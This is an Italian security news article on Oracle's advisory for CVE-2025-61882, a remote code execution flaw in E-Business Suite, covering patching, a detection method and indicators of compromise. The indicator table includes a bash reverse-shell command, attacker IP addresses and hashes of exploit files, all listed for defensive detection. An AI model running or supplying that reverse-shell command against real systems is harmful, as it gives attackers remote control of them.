Red Hot Cyber
Sicurezza Informatica, Notizie su Cybercrime e Analisi Vulnerabilità
Oracle ha pubblicato un avviso di sicurezza relativo a una vulnerabilità critica identificata come CVE-2025-61882 presente nella suite Oracle E-Business. La falla può essere sfruttata da remoto senza necessità di autenticazione, consentendo potenzialmente l’esecuzione di codice malevolo sui sistemi colpiti.
L’azienda raccomanda ai propri clienti di applicare immediatamente gli aggiornamenti indicati nell’avviso. Oracle sottolinea l’importanza di mantenere le versioni dei prodotti attivamente supportate e di installare senza ritardo tutte le patch di sicurezza critiche. In particolare, l’aggiornamento delle patch critiche rilasciate nell’ottobre 2023 rappresenta un prerequisito per l’implementazione delle nuove correzioni.
Per supportare il rilevamento e il contenimento immediato di eventuali attacchi, l’avviso include una matrice dei rischi con indicatori di compromissione, quali indirizzi IP sospetti, comandi e file associati agli exploit conosciuti.
La vulnerabilità interessa specificamente le versioni di Oracle E-Business Suite dalla 12.2.3 alla 12.2.14. La documentazione ufficiale, disponibile tramite i link forniti da Oracle, contiene informazioni dettagliate sulle patch e sulle modalità di installazione.
| rodotti e versioni interessati | Documento sulla disponibilità delle patch |
|---|---|
| Oracle E-Business Suite, versioni 12.2.3-12.2.14 | Oracle E-Business Suite |
Le patch fornite tramite il programma Security Alert sono disponibili solo per le versioni coperte dal Premier Support o dall’Extended Support secondo la Lifetime Support Policy di Oracle.
Le versioni non incluse in questi programmi non vengono testate per le vulnerabilità segnalate, anche se potrebbero comunque essere interessate. Per questa ragione, Oracle consiglia l’aggiornamento alle versioni supportate per garantire protezione e compatibilità con le patch di sicurezza.
La vulnerabilità CVE-2025-61882 riguarda Oracle E‑Business Suite ed è sfruttabile da remoto senza autenticazione, con potenziale esecuzione di codice remoto se sfruttata con successo.
Su GitHub è stato pubblicato un metodo pubblico di rilevamento che aiuta a identificare istanze potenzialmente non aggiornate. Il metodo segnala un’istanza come sospetta quando la pagina restituisce la stringa “E-Business Suite Home Page” e l’intestazione HTTP Last-Modified riporta una data precedente al 4 ottobre 2025 (timestamp Unix 1759602752).
Questo approccio è descritto come uno strumento di individuazione — non come un vettore di attacco — e dovrebbe essere usato esclusivamente per scopi di verifica e difesa. Per rimuovere il rischio, Oracle raccomanda l’applicazione delle patch indicate nell’avviso di sicurezza e l’aggiornamento alle versioni supportate.
Di seguito sono riportati gli indicatori di compromissione (indirizzi IP, comandi osservati e file) per supportare il rilevamento, la ricerca e il contenimento immediati.
| Indicator | Type | Description |
|---|---|---|
| 200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
| 185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
